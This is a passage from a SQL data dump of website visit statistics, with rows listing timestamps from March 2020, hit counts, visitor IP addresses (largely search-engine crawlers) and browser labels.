'8.29.198.27','other'),(488533,1584190140,1,1,0,0,'66.249.70.36','chrome'),(488534,1584191087,3,3,0,0,'66.249.64.23','chrome'),(488535,1584191156,1,1,0,0,'66.249.64.24','chrome'),(488536,1584192286,1,1,0,0,'66.249.70.38','chrome'),(488537,1584192338,1,1,0,0,'93.119.227.19','other'),(488539,1584192892,1,1,0,0,'157.55.39.78','other'),(488540,1584193300,1,1,0,0,'52.55.102.59','chrome'),(488541,1584193554,1,1,0,0,'66.249.64.23','chrome'),(488542,1584193625,1,1,0,0,'207.46.13.47','other'),(488543,1584193845,1,1,0,0,'66.249.64.24','chrome'),(488544,1584193935,2,2,0,0,'66.249.64.25','chrome'),(488545,1584194018,1,1,0,0,'66.249.70.38','chrome'),(488546,1584194691,1,1,0,0,'66.249.70.36','chrome'),(488547,1584194725,1,1,0,0,'157.55.39.78','other'),(488548,1584194957,1,1,0,0,'178.154.171.134','other'),(488549,1584195061,1,1,0,0,'207.46.13.131','other'),(488550,1584195181,1,1,0,0,'66.249.70.38','chrome'),(488551,1584195194,1,1,0,0,'66.249.64.24','chrome'),(488552,1584195536,1,1,0,0,'66.249.64.25','chrome'),(488553,1584195559,3,3,0,0,'66.249.64.23','chrome'),(488554,1584196171,2,2,0,0,'66.249.70.36','chrome'),(488555,1584196176,1,1,0,0,'66.249.64.24','chrome'),(488556,1584196519,1,1,0,0,'178.154.171.134','other'),(488557,1584196643,2,2,0,0,'82.202.204.118','chrome'),(488558,1584196965,1,1,0,0,'157.55.39.78','other'),(488559,1584197066,2,2,0,0,'207.46.13.131','other'),(488560,1584197743,5,5,0,0,'66.249.64.25','chrome'),(488561,1584197785,1,1,0,0,'66.249.64.23','chrome'),(488562,1584197873,1,1,0,0,'157.55.39.78','other'),(488563,1584198559,1,1,0,0,'66.249.70.38','chrome'),(488564,1584199126,5,5,0,0,'207.46.13.47','other'),(488565,1584199222,1,1,0,0,'66.249.64.25','chrome'),(488566,1584199643,1,1,0,0,'66.249.64.24','chrome'),(488567,1584200329,1,1,0,0,'207.46.13.131','other'),(488568,1584200400,2,2,0,0,'157.55.39.78','other'),(488569,1584200494,1,1,0,0,'66.249.64.25','chrome'),(488570,1584200872,1,1,0,0,'207.46.13.47','other'),(488571,1584200994,1,1,0,0,'8.29.198.25','other'),(488572,1584201736,1,1,0,0,'8.29.198.26','other'),(488573,1584201976,1,1,0,0,'157.55.39.78','other'),(488574,1584202041,2,2,0,0,'66.249.64.24','chrome'),(488575,1584202290,1,1,0,0,'18.184.195.200','chrome'),(488576,1584202602,2,2,0,0,'66.249.64.25','chrome'),(488577,1584202659,2,2,0,0,'91.196.178.109','other'),(488578,1584202759,1,1,0,0,'66.249.70.36','chrome'),(488579,1584202904,2,2,0,0,'157.55.39.78','other'),(488580,1584203265,2,2,0,0,'66.249.64.23','chrome'),(488581,1584203420,2,1,1,0,'207.46.13.47',''),(488582,1584204320,1,1,0,0,'66.249.64.24','chrome'),(488583,1584204584,2,2,0,0,'207.46.13.47','other'),(488584,1584205076,2,2,0,0,'66.249.64.23','chrome'),(488585,1584205135,1,1,0,0,'207.46.13.131','other'),(488586,1584205350,1,1,0,0,'66.249.64.24','chrome'),(488587,1584206027,1,1,0,0,'66.249.70.36','chrome'),(488588,1584206064,2,2,0,0,'207.46.13.131','other'),(488589,1584206848,5,5,0,0,'185.230.242.3','other'),(488590,1584206849,2,2,0,0,'207.46.13.47','other'),(488591,1584207463,2,2,0,0,'207.46.13.131','other'),(488592,1584207939,1,0,1,0,'66.249.64.25',''),(488593,1584208013,1,1,0,0,'178.154.171.127','other'),(488594,1584208589,1,1,0,0,'185.230.242.3','other'),(488595,1584209308,1,1,0,0,'66.249.64.24','chrome'),(488596,1584209517,3,3,0,0,'207.46.13.47','other'),(488597,1584210165,1,1,0,0,'185.230.242.3','other'),(488598,1584210598,2,2,0,0,'207.46.13.131','other'),(488599,1584211638,4,4,0,0,'185.230.242.3','other'),(488600,1584211871,2,2,0,0,'207.46.13.131','other'),(488601,1584211891,1,1,0,0,'8.29.198.25','other'),(488602,1584211901,3,3,0,0,'207.46.13.47','other'),(488603,1584212133,2,2,0,0,'157.55.39.78','other'),(488604,1584212576,17,17,0,0,'185.230.242.3','other'),(488605,1584212607,1,1,0,0,'8.29.198.27','other'),(488606,1584213993,2,2,0,0,'66.249.64.24','chrome'),(488607,1584214019,2,2,0,0,'185.230.242.3','other'),(488608,1584214337,1,1,0,0,'37.9.113.200','other'),(488609,1584214814,4,4,0,0,'66.249.64.23','chrome'),(488610,1584215504,2,2,0,0,'207.46.13.47','other'),(488611,1584215652,1,1,0,0,'178.95.79.167','chrome'),(488612,1584215829,2,2,0,0,'66.249.64.25','chrome'),(488613,1584216450,2,2,0,0,'207.46.13.131','other'),(488614,1584216475,1,1,0,0,'66.249.64.24','chrome'),(488615,1584216538,2,2,0,0,'157.55.39.78','other'),(488616,1584217747,2,2,0,0,'66.249.64.23','chrome'),(488617,1584217801,1,1,0,0,'207.46.13.88','other'),(488618,1584217858,5,5,0,0,'185.230.242.3','other'),(488619,1584217868,1,1,0,0,'66.249.64.25','chrome'),(488620,1584218595,1,1,0,0,'66.249.64.24','chrome'),(488621,1584218620,1,1,0,0,'66.249.70.36','chrome'),(488622,1584218649,1,1,0,0,'66.249.70.38','chrome'),(488623,1584218999,5,5,0,0,'185.230.242.3','other'),(488624,1584219262,2,2,0,0,'157.55.39.78','other'),(488625,1584219922,10,10,0,0,'185.230.242.3','other'),(488626,1584220147,1,0,1,0,'66.249.64.23',''),(488627,1584220265,1,0,1,0,'157.55.39.78',''),(488628,1584220278,1,0,1,0,'207.46.13.131',''),(488629,1584220323,1,1,0,0,'207.46.13.206','other'),(488630,1584220375,1,1,0,0,'66.249.70.38','chrome'),(488631,1584220561,2,2,0,0,'207.46.13.131','other'),(488632,1584220651,1,1,0,0,'66.249.64.24','chrome'),(488633,1584220973,1,1,0,0,'178.154.171.134','other'),(488634,1584221414,1,1,0,0,'66.249.64.25','chrome'),(488635,1584221863,1,1,0,0,'66.249.70.38','chrome'),(488636,1584221931,1,1,0,0,'207.46.13.88','other'),(488637,1584222365,1,1,0,0,'66.249.64.24','chrome'),(488638,1584222773,1,1,0,0,'8.29.198.26','other'),(488639,1584222883,4,4,0,0,'185.230.242.3','other'),(488640,1584223281,3,3,0,0,'66.249.64.24','chrome'),(488641,1584223385,1,1,0,0,'66.249.64.23','chrome'),(488642,1584223464,1,1,0,0,'8.29.198.25','other'),(488643,1584223527,1,1,0,0,'95.213.184.236','firefox'),(488644,1584224037,1,1,0,0,'66.249.70.38','chrome'),(488645,1584224276,1,1,0,0,'66.249.64.24','chrome'),(488646,1584224447,1,1,0,0,'37.9.113.33','other'),(488647,1584224661,1,1,0,0,'157.55.39.78','other'),(488648,1584224737,1,1,0,0,'141.8.183.15','other'),(488649,1584224853,2,2,0,0,'66.249.64.25','chrome'),(488650,1584224883,1,1,0,0,'207.46.13.88','other'),(488651,1584224992,1,1,0,0,'66.249.64.23','chrome'),(488652,1584226153,14,14,0,0,'185.230.242.3','other'),(488653,1584226218,1,1,0,0,'157.55.39.78','other'),(488654,1584226535,1,0,1,0,'66.249.64.25',''),(488655,1584226710,1,1,0,0,'93.124.15.87','chrome'),(488656,1584227281,2,2,0,0,'66.249.64.23','chrome'),(488657,1584227398,22,22,0,0,'185.230.242.3','other'),(488658,1584227639,3,3,0,0,'66.249.64.25','chrome'),(488659,1584228259,1,1,0,0,'52.14.75.127','chrome'),(488660,1584228469,4,4,0,0,'66.249.64.23','chrome'),(488661,1584228668,3,3,0,0,'66.249.64.25','chrome'),(488662,1584229087,1,1,0,0,'207.46.13.88','other'),(488663,1584229489,2,2,0,0,'66.249.64.24','chrome'),(488664,1584229997,1,1,0,0,'66.249.70.38','chrome'),(488665,1584230066,1,1,0,0,'157.55.39.78','other'),(488666,1584230070,1,1,0,0,'207.46.13.88','other'),(488667,1584230071,1,1,0,0,'66.249.64.25','chrome'),(488668,1584230400,16,16,0,0,'185.230.242.3','other'),(488669,1584230464,1,1,0,0,'66.249.64.23','chrome'),(488670,1584230532,1,1,0,0,'207.46.13.131','other'),(488671,1584231693,1,0,1,0,'66.249.64.25',''),(488672,1584231854,3,2,1,0,'207.46.13.88',''),(488673,1584231996,4,4,0,0,'66.249.64.23','chrome'),(488674,1584232061,1,1,0,0,'66.249.64.24','chrome'),(488675,1584232636,1,1,0,0,'207.46.13.206','other'),(488676,1584232640,1,0,1,0,'207.46.13.131',''),(488677,1584232705,1,1,0,0,'207.46.13.131','other'),(488678,1584232765,1,1,0,0,'157.55.39.78','other'),(488679,1584233053,1,1,0,0,'207.46.13.88','other'),(488680,1584233261,1,0,1,0,'66.249.64.25',''),(488681,1584233678,1,1,0,0,'8.29.198.26','other'),(488682,1584233713,1,1,0,0,'62.205.134.182','other'),(488683,1584233822,1,1,0,0,'66.249.70.33','chrome'),(488684,1584233897,1,1,0,0,'66.249.64.25','chrome'),(488685,1584234320,1,1,0,0,'8.29.198.27','other'),(488686,1584235333,14,14,0,0,'185.230.242.3','other'),(488687,1584235597,1,1,0,0,'207.46.13.88','other'),(488688,1584235878,3,3,0,0,'207.46.13.131','other'),(488689,1584236081,1,1,0,0,'66.249.64.23','chrome'),(488690,1584236573,1,1,0,0,'66.249.64.24','chrome'),(488691,1584236801,2,2,0,0,'178.154.171.134','other'),(488692,1584236802,1,1,0,0,'178.154.171.127','other'),(488693,1584236875,1,1,0,0,'185.230.242.3','other'),(488694,1584237118,3,3,0,0,'207.46.13.131','other'),(488695,1584237304,1,1,0,0,'66.249.70.33','chrome'),(488696,1584237613,1,1,0,0,'66.249.64.24','chrome'),(488697,1584237859,1,1,0,0,'178.154.171.134','other'),(488698,1584237935,2,2,0,0,'207.46.13.88','other'),(488699,1584238074,21,21,0,0,'82.165.102.133','firefox'),(488700,1584238389,1,1,0,0,'207.46.13.131','other'),(488701,1584238587,10,10,0,0,'185.230.242.3','other'),(488702,1584238697,1,1,0,0,'178.154.171.127','other'),(488703,1584239328,1,1,0,0,'178.154.171.134','other'),(488704,1584239544,10,10,0,0,'185.230.242.3','other'),(488705,1584239651,2,2,0,0,'35.232.36.47','chrome'),(488706,1584239687,3,3,0,0,'35.184.216.157','chrome'),(488707,1584239697,1,1,0,0,'173.255.114.98','chrome'),(488708,1584239698,4,4,0,0,'173.255.114.98','chrome'),(488709,1584239714,1,1,0,0,'35.188.144.232','chrome'),(488710,1584239715,2,2,0,0,'35.188.144.232','chrome'),(488711,1584239723,3,3,0,0,'35.194.13.111','chrome'),(488712,1584239961,1,1,0,0,'66.249.64.24','chrome'),(488713,1584240229,1,1,0,0,'31.13.115.11','other'),(488714,1584240643,1,1,0,0,'207.46.13.131','other'),(488715,1584241448,3,3,0,0,'185.230.242.3','other'),(488716,1584241564,3,3,0,0,'66.249.64.25','chrome'),(488717,1584241625,1,1,0,0,'31.13.115.18','other'),(488718,1584242304,2,2,0,0,'207.46.13.131','other'),(488719,1584242418,2,2,0,0,'207.46.13.88','other'),(488720,1584242960,1,1,0,0,'66.249.64.25','chrome'),(488721,1584243080,1,1,0,0,'66.249.64.23','chrome'),(488722,1584243379,1,1,0,0,'66.249.70.33','chrome'),(488723,1584243866,2,2,0,0,'207.46.13.131','other'),(488724,1584244125,1,1,0,0,'185.230.242.3','other'),(488725,1584244539,2,2,0,0,'8.29.198.25','other'),(488726,1584245816,1,1,0,0,'66.249.64.23','chrome'),(488727,1584246617,1,1,0,0,'66.249.64.24','chrome'),(488728,1584247960,1,1,0,0,'185.230.242.3','other'),(488729,1584247967,1,1,0,0,'178.154.171.134','other'),(488730,1584248095,1,1,0,0,'66.249.64.23','chrome'),(488731,1584248274,1,1,0,0,'66.249.70.33','chrome'),(488732,1584248780,1,1,0,0,'91.209.11.236','other'),(488733,1584248846,1,1,0,0,'17.58.101.25','other'),(488734,1584249075,1,1,0,0,'66.249.70.38','chrome'),(488735,1584249240,1,1,0,0,'178.154.171.127','other'),(488736,1584249315,1,1,0,0,'207.46.13.206','other'),(488737,1584249418,1,1,0,0,'66.249.64.25','chrome'),(488738,1584249515,1,0,1,0,'207.46.13.131',''),(488739,1584249892,2,2,0,0,'162.210.196.129','other'),(488740,1584250904,1,1,0,0,'62.205.134.182','other'),(488741,1584250990,1,1,0,0,'66.249.64.25','chrome'),(488742,1584251089,1,1,0,0,'178.154.171.134','other'),(488743,1584251283,1,1,0,0,'66.249.64.23','chrome'),(488744,1584252382,3,3,0,0,'66.249.64.25','chrome'),(488745,1584252407,1,1,0,0,'66.249.64.24','chrome'),(488746,1584252895,1,1,0,0,'207.46.13.131','other'),(488747,1584253701,2,2,0,0,'66.249.64.24','chrome'),(488748,1584253815,1,1,0,0,'66.249.64.23','chrome'),(488749,1584253957,1,1,0,0,'207.46.13.88','other'),(488750,1584254213,1,1,0,0,'66.249.64.25','chrome'),(488751,1584254238,2,2,0,0,'66.249.70.38','chrome'),(488752,1584254338,2,2,0,0,'54.191.203.12','chrome'),(488753,1584254341,5,5,0,0,'54.191.203.12','firefox'),(488754,1584255381,1,1,0,0,'207.46.13.131','other'),(488755,1584255398,1,1,0,0,'8.29.198.25','other'),(488756,1584255406,1,1,0,0,'178.154.171.134','other'),(488757,1584255569,1,1,0,0,'66.249.64.25','chrome'),(488758,1584255837,2,2,0,0,'66.249.64.23','chrome'),(488759,1584256037,1,1,0,0,'8.29.198.27','other'),(488760,1584256539,1,1,0,0,'66.249.70.38','chrome'),(488761,1584256790,2,2,0,0,'207.46.13.131','other'),(488762,1584257122,15,15,0,0,'185.230.242.3','other'),(488763,1584257414,1,0,1,0,'66.249.64.24',''),(488764,1584257560,1,0,1,0,'66.249.64.23',''),(488765,1584257663,1,1,0,0,'66.249.64.24','chrome'),(488766,1584258601,1,1,0,0,'185.230.242.3','other'),(488767,1584258672,1,0,1,0,'66.249.64.25',''),(488768,1584258911,1,1,0,0,'91.196.178.89','firefox'),(488769,1584258998,1,1,0,0,'128.124.127.116','chrome'),(488770,1584259063,1,1,0,0,'91.196.178.89','chrome'),(488771,1584259330,2,2,0,0,'66.249.64.24','chrome'),(488772,1584259557,1,1,0,0,'207.46.13.131','other'),(488773,1584260120,1,0,1,0,'66.249.64.25',''),(488774,1584260961,2,1,1,0,'66.249.64.25',''),(488775,1584261701,1,1,0,0,'207.46.13.88','other'),(488776,1584263132,13,13,0,0,'185.230.242.3','other'),(488777,1584264092,1,1,0,0,'207.46.13.131','other'),(488778,1584264129,1,1,0,0,'185.230.242.3','other'),(488779,1584264467,1,1,0,0,'66.249.64.23','chrome'),(488780,1584264567,1,1,0,0,'66.249.64.25','chrome'),(488781,1584265142,1,1,0,0,'207.46.13.88','other'),(488782,1584265652,2,2,0,0,'91.209.11.236','other'),(488783,1584266096,2,2,0,0,'178.154.171.134','other'),(488784,1584266115,1,1,0,0,'66.249.70.33','chrome'),(488785,1584266263,1,1,0,0,'8.29.198.25','other'),(488786,1584266374,1,1,0,0,'66.249.64.25','chrome'),(488787,1584266723,1,1,0,0,'91.209.11.236','other'),(488788,1584266783,1,1,0,0,'185.15.56.22','other'),(488789,1584266893,1,1,0,0,'8.29.198.27','other'),(488790,1584267080,1,1,0,0,'66.249.64.24','chrome'),(488791,1584267861,1,1,0,0,'66.249.70.38','chrome'),(488792,1584267891,3,3,0,0,'66.249.64.23','chrome'),(488793,1584268005,1,1,0,0,'66.249.70.36','chrome'),(488794,1584268075,2,2,0,0,'66.249.64.24','chrome'),(488795,1584268216,1,1,0,0,'178.154.171.127','other'),(488796,1584268255,1,1,0,0,'91.209.11.236','other'),(488797,1584268503,1,1,0,0,'31.13.127.9','other'),(488798,1584268504,1,1,0,0,'31.13.127.17','other'),(488800,1584268567,19,19,0,0,'185.230.242.3','other'),(488801,1584269055,1,1,0,0,'178.154.171.134','other'),(488802,1584269166,2,2,0,0,'91.209.11.236','other'),(488803,1584269259,1,1,0,0,'66.249.64.24','chrome'),(488804,1584269314,1,1,0,0,'66.249.70.33','chrome'),(488805,1584269354,3,3,0,0,'66.249.64.25','chrome'),(488806,1584269423,2,2,0,0,'66.249.64.23','chrome'),(488807,1584270358,1,1,0,0,'66.249.64.23','chrome'),(488808,1584270367,1,1,0,0,'91.209.11.236','other'),(488809,1584270373,2,2,0,0,'66.249.64.24','chrome'),(488810,1584270537,2,2,0,0,'66.249.64.25','chrome'),(488811,1584271297,3,3,0,0,'91.209.11.236','other'),(488812,1584271345,6,6,0,0,'60.191.38.77','firefox'),(488813,1584271696,1,1,0,0,'17.58.101.25','other'),(488814,1584272053,1,1,0,0,'5.102.58.41','chrome'),(488815,1584272132,1,1,0,0,'31.13.127.24','other'),(488816,1584272272,2,2,0,0,'178.154.171.127','other'),(488817,1584272275,4,4,0,0,'178.154.171.134','other'),(488818,1584272477,1,1,0,0,'37.9.113.10','other'),(488819,1584272512,1,1,0,0,'66.249.64.23','chrome'),(488820,1584272977,2,2,0,0,'91.209.11.236','other'),(488821,1584273187,3,3,0,0,'178.154.171.134','other'),(488822,1584273292,1,1,0,0,'109.95.51.164','other'),(488823,1584273465,3,3,0,0,'66.249.64.24','chrome'),(488824,1584273683,1,1,0,0,'207.46.13.88','other'),(488825,1584273690,1,1,0,0,'193.106.30.99','firefox'),(488826,1584273898,1,1,0,0,'46.219.219.37','firefox'),(488827,1584274352,3,3,0,0,'91.209.11.236','other'),(488828,1584274433,1,1,0,0,'31.13.127.23','other'),(488829,1584274434,1,1,0,0,'31.13.127.10','other'),(488830,1584274796,3,3,0,0,'207.46.13.88','other'),(488831,1584274800,1,1,0,0,'46.219.219.37','firefox'),(488832,1584275004,1,1,0,0,'84.246.211.186','firefox'),(488833,1584275050,5,5,0,0,'151.80.39.236','other'),(488834,1584275195,1,1,0,0,'66.249.64.24','chrome'),(488835,1584275230,1,1,0,0,'151.80.39.80','other'),(488836,1584275635,1,1,0,0,'66.249.64.23','chrome'),(488837,1584275741,2,2,0,0,'91.209.11.236','other'),(488838,1584276099,2,2,0,0,'151.80.39.236','other'),(488839,1584276440,5,5,0,0,'151.80.39.80','other'),(488840,1584276460,1,1,0,0,'109.74.154.72','chrome'),(488841,1584276607,1,1,0,0,'91.196.178.82','chrome'),(488842,1584277062,2,2,0,0,'91.209.11.236','other'),(488843,1584277125,2,2,0,0,'8.29.198.26','other'),(488844,1584277339,4,4,0,0,'151.80.39.236','other'),(488845,1584277400,3,3,0,0,'66.249.64.25','chrome'),(488846,1584277840,4,4,0,0,'151.80.39.80','other'),(488847,1584278446,1,1,0,0,'91.209.11.236','other'),(488848,1584278529,2,2,0,0,'151.80.39.236','other'),(488849,1584279059,4,4,0,0,'151.80.39.80','other'),(488850,1584279122,12,12,0,0,'185.230.242.3','other'),(488851,1584279371,2,2,0,0,'91.209.11.236','other'),(488852,1584279496,1,1,0,0,'207.46.13.88','other'),(488853,1584279552,1,1,0,0,'66.249.64.25','chrome'),(488854,1584279566,3,3,0,0,'151.80.39.236','other'),(488855,1584280063,4,4,0,0,'151.80.39.80','other'),(488856,1584280621,4,4,0,0,'151.80.39.236','other'),(488857,1584280705,1,1,0,0,'93.124.15.87','chrome'),(488858,1584280714,1,1,0,0,'66.249.70.36','chrome'),(488859,1584281216,1,1,0,0,'91.209.11.236','other'),(488860,1584281329,3,3,0,0,'151.80.39.80','other'),(488861,1584281461,17,17,0,0,'185.230.242.3','other'),(488862,1584281618,6,6,0,0,'151.80.39.236','other'),(488863,1584281862,1,1,0,0,'66.249.64.23','chrome'),(488864,1584281893,1,1,0,0,'66.249.64.24','chrome'),(488865,1584282188,2,2,0,0,'91.209.11.236','other'),(488866,1584282542,1,1,0,0,'66.249.64.25','chrome'),(488867,1584282549,3,3,0,0,'151.80.39.236','other'),(488868,1584282677,4,4,0,0,'151.80.39.80','other'),(488869,1584282873,14,14,0,0,'185.230.242.3','other'),(488870,1584283101,2,2,0,0,'91.209.11.236','other'),(488871,1584283419,1,1,0,0,'66.249.70.38','chrome'),(488872,1584283490,2,2,0,0,'31.13.127.10','other'),(488873,1584283491,1,1,0,0,'31.13.127.8','other'),(488875,1584283554,3,3,0,0,'151.80.39.236','other'),(488876,1584283704,3,3,0,0,'151.80.39.80','other'),(488877,1584283937,1,1,0,0,'91.196.178.164','chrome'),(488878,1584284098,2,2,0,0,'207.46.13.88','other'),(488879,1584284218,6,6,0,0,'185.230.242.3','other'),(488880,1584284465,5,5,0,0,'151.80.39.236','other'),(488881,1584284568,2,2,0,0,'91.209.11.236','other'),(488882,1584284638,2,2,0,0,'151.80.39.80','other'),(488883,1584284940,1,1,0,0,'178.154.171.134','other'),(488884,1584285571,3,3,0,0,'151.80.39.236','other'),(488885,1584285638,2,2,0,0,'91.209.11.236','other'),(488886,1584285893,4,4,0,0,'151.80.39.80','other'),(488887,1584286206,1,1,0,0,'178.154.171.134','other'),(488888,1584286491,1,1,0,0,'151.80.39.236','other'),(488889,1584286638,1,1,0,0,'207.46.13.88','other'),(488890,1584286670,2,2,0,0,'91.209.11.236','other'),(488891,1584286716,1,1,0,0,'66.249.64.24','chrome'),(488892,1584286849,1,1,0,0,'66.249.64.23','chrome'),(488893,1584286975,3,3,0,0,'151.80.39.80','other'),(488894,1584287024,1,1,0,0,'91.196.178.82','chrome'),(488895,1584287375,1,1,0,0,'66.249.64.25','chrome'),(488896,1584287438,2,2,0,0,'151.80.39.236','other'),(488897,1584287750,1,1,0,0,'91.209.11.236','other'),(488898,1584287872,1,1,0,0,'94.153.78.229','chrome'),(488899,1584287974,1,1,0,0,'8.29.198.26','other'),(488900,1584288298,2,2,0,0,'151.80.39.80','other'),(488901,1584288552,1,1,0,0,'66.249.64.25','chrome'),(488902,1584288601,1,1,0,0,'8.29.198.25','other'),(488903,1584288615,2,2,0,0,'151.80.39.236','other'),(488904,1584288888,35,35,0,0,'82.165.67.149','firefox'),(488905,1584288890,2,2,0,0,'82.165.67.149','other'),(488906,1584289592,3,3,0,0,'151.80.39.80','other'),(488907,1584289774,1,1,0,0,'87.250.224.90','other'),(488908,1584289928,1,1,0,0,'207.46.13.88','other'),(488909,1584289942,1,1,0,0,'178.154.171.134','other'),(488910,1584290384,1,1,0,0,'66.249.70.38','chrome'),(488911,1584290509,2,2,0,0,'151.80.39.236','other'),(488912,1584290850,1,1,0,0,'5.45.207.49','other'),(488913,1584291141,1,1,0,0,'151.80.39.80','other'),(488914,1584291169,1,1,0,0,'66.249.70.36','chrome'),(488915,1584291189,17,17,0,0,'185.230.242.3','other'),(488916,1584291305,1,1,0,0,'31.13.127.10','other'),(488917,1584291458,1,1,0,0,'66.249.64.23','chrome'),(488918,1584291477,2,2,0,0,'151.80.39.236','other'),(488919,1584292131,2,2,0,0,'151.80.39.80','other'),(488920,1584292800,2,2,0,0,'178.154.171.134','other'),(488921,1584293415,2,2,0,0,'66.249.64.25','chrome'),(488922,1584293656,2,2,0,0,'151.80.39.80','other'),(488923,1584293739,1,1,0,0,'66.249.70.33','chrome'),(488924,1584294555,1,0,1,0,'66.249.64.23',''),(488925,1584294575,9,9,0,0,'185.230.242.3','other'),(488926,1584294742,1,1,0,0,'207.46.13.88','other'),(488927,1584295109,2,2,0,0,'66.249.64.23','chrome'),(488928,1584295284,1,1,0,0,'3.122.180.77','other'),(488929,1584295720,1,1,0,0,'66.249.70.36','chrome'),(488930,1584296033,1,1,0,0,'151.80.39.236','other'),(488931,1584296260,1,1,0,0,'66.249.64.25','chrome'),(488932,1584296422,2,2,0,0,'178.154.171.134','other'),(488933,1584296909,1,0,1,0,'66.249.64.24',''),(488934,1584297159,1,1,0,0,'207.46.13.88','other'),(488935,1584297212,1,1,0,0,'91.196.178.82','chrome'),(488936,1584297233,2,2,0,0,'66.249.64.23','chrome'),(488937,1584297293,1,1,0,0,'66.249.70.38','chrome'),(488938,1584297469,2,2,0,0,'207.46.13.110','other'),(488939,1584297495,1,1,0,0,'178.154.171.134','other'),(488940,1584298171,1,1,0,0,'151.80.39.236','other'),(488941,1584298840,1,1,0,0,'8.29.198.25','other'),(488942,1584299412,1,1,0,0,'66.249.70.33','chrome'),(488943,1584299462,1,1,0,0,'8.29.198.27','other'),(488944,1584299790,17,17,0,0,'185.230.242.3','other'),(488945,1584300570,1,1,0,0,'178.154.171.134','other'),(488946,1584301431,1,1,0,0,'151.80.39.80','other'),(488947,1584301553,1,1,0,0,'17.58.101.25','other'),(488948,1584302220,1,1,0,0,'91.196.178.157','firefox'),(488949,1584302317,1,1,0,0,'207.46.13.110','other'),(488950,1584302497,1,1,0,0,'37.110.135.242','chrome'),(488951,1584303146,1,1,0,0,'178.154.171.127','other'),(488952,1584303978,2,2,0,0,'178.154.171.134','other'),(488953,1584304461,1,1,0,0,'66.249.64.24','chrome'),(488954,1584305154,1,1,0,0,'207.46.13.110','other'),(488955,1584305377,1,1,0,0,'66.249.64.24','chrome'),(488956,1584305380,1,1,0,0,'178.154.171.127','other'),(488957,1584306718,1,1,0,0,'66.249.70.36','chrome'),(488958,1584306742,4,4,0,0,'185.230.242.3','other'),(488959,1584307864,1,1,0,0,'185.230.242.3','other'),(488960,1584308116,1,1,0,0,'178.154.171.134','other'),(488961,1584308251,2,2,0,0,'178.154.171.127','other'),(488962,1584308453,1,1,0,0,'207.46.13.110','other'),(488963,1584308675,2,1,1,0,'66.249.64.23',''),(488964,1584309333,1,1,0,0,'207.46.13.88','other'),(488965,1584309635,1,1,0,0,'178.154.171.134','other'),(488966,1584309699,1,1,0,0,'8.29.198.27','other'),(488967,1584310044,1,1,0,0,'66.249.70.36','chrome'),(488968,1584310260,1,1,0,0,'66.249.70.33','chrome'),(488969,1584310314,1,1,0,0,'8.29.198.25','other'),(488970,1584312800,21,21,0,0,'185.230.242.3','other'),(488971,1584313397,1,1,0,0,'207.46.13.88','other'),(488972,1584313476,1,1,0,0,'178.154.171.134','other'),(488973,1584313574,1,1,0,0,'66.249.64.23','chrome'),(488974,1584313749,13,13,0,0,'185.230.242.3','other'),(488975,1584314666,1,1,0,0,'66.249.64.25','chrome'),(488976,1584314845,5,5,0,0,'185.230.242.3','other'),(488977,1584315123,1,1,0,0,'66.249.64.24','chrome'),(488978,1584315363,1,1,0,0,'66.249.64.23','chrome'),(488979,1584315388,2,2,0,0,'178.154.171.127','other'),(488980,1584315765,1,1,0,0,'185.230.242.3','other'),(488981,1584316557,2,2,0,0,'207.46.13.88','other'),(488982,1584316996,2,2,0,0,'66.249.64.24','chrome'),(488983,1584317897,1,1,0,0,'66.249.64.24','chrome'),(488984,1584318118,1,1,0,0,'207.46.13.88','other'),(488985,1584318365,1,1,0,0,'66.249.70.38','chrome'),(488986,1584318520,2,2,0,0,'207.46.13.110','other'),(488987,1584319259,2,2,0,0,'185.230.242.3','other'),(488988,1584320116,1,1,0,0,'62.205.134.182','other'),(488989,1584320416,1,1,0,0,'66.249.64.25','chrome'),(488990,1584320558,1,1,0,0,'8.29.198.26','other'),(488991,1584320646,1,1,0,0,'66.249.70.38','chrome'),(488992,1584320670,1,1,0,0,'66.249.64.23','chrome'),(488993,1584321163,1,1,0,0,'8.29.198.25','other'),(488994,1584321866,19,19,0,0,'185.230.242.3','other'),(488995,1584322095,2,2,0,0,'207.46.13.88','other'),(488996,1584322254,1,1,0,0,'66.249.64.24','chrome'),(488997,1584322812,1,1,0,0,'178.154.171.134','other'),(488998,1584323380,1,1,0,0,'185.230.242.3','other'),(488999,1584323900,2,2,0,0,'66.249.64.23','chrome'),(489000,1584324686,1,1,0,0,'207.46.13.88','other'),(489001,1584325569,2,2,0,0,'66.249.64.23','chrome'),(489002,1584325592,1,1,0,0,'66.249.64.24','chrome'),(489003,1584326085,1,1,0,0,'66.249.64.25','chrome'),(489004,1584326358,1,1,0,0,'2.47.39.217','other'),(489005,1584327851,1,1,0,0,'178.154.171.134','other'),(489006,1584329267,1,1,0,0,'66.249.70.38','chrome'),(489007,1584329659,1,1,0,0,'66.249.64.24','chrome'),(489008,1584329663,1,1,0,0,'66.249.64.23','chrome'),(489009,1584330232,10,10,0,0,'185.230.242.3','other'),(489010,1584331061,1,1,0,0,'66.249.64.25','chrome'),(489011,1584331298,2,2,0,0,'66.249.64.24','chrome'),(489012,1584331419,1,1,0,0,'8.29.198.25','other'),(489013,1584332011,1,1,0,0,'8.29.198.27','other'),(489014,1584332106,1,1,0,0,'66.249.70.36','chrome'),(489015,1584332339,1,1,0,0,'178.154.171.134','other'),(489016,1584332709,1,1,0,0,'178.154.171.127','other'),(489017,1584333481,1,1,0,0,'207.46.13.88','other'),(489018,1584333931,1,1,0,0,'66.249.64.25','chrome'),(489019,1584334007,1,1,0,0,'66.249.64.23','chrome'),(489020,1584334121,1,1,0,0,'66.249.70.38','chrome'),(489021,1584334349,1,1,0,0,'66.249.64.24','chrome'),(489022,1584334442,15,15,0,0,'185.230.242.3','other'),(489023,1584335223,1,1,0,0,'66.249.64.25','chrome'),(489024,1584335913,6,6,0,0,'185.230.242.3','other'),(489025,1584336202,1,1,0,0,'66.249.64.25','chrome'),(489026,1584337351,1,1,0,0,'62.205.134.182','other'),(489027,1584337571,1,1,0,0,'66.249.70.36','chrome'),(489028,1584337683,1,1,0,0,'207.46.13.88','other'),(489029,1584337818,1,1,0,0,'66.249.64.23','chrome'),(489030,1584337960,1,1,0,0,'66.249.64.24','chrome'),(489031,1584338084,16,16,0,0,'185.230.242.3','other'),(489032,1584338321,1,0,1,0,'66.249.64.25',''),(489033,1584338356,1,1,0,0,'52.28.20.113','other'),(489034,1584338982,1,1,0,0,'66.249.64.25','chrome'),(489035,1584340288,1,1,0,0,'66.249.64.24','chrome'),(489036,1584340467,1,1,0,0,'91.196.178.76','chrome'),(489037,1584340600,1,1,0,0,'107.21.1.8','other'),(489038,1584340602,1,1,0,0,'54.208.102.37','other'),(489039,1584341220,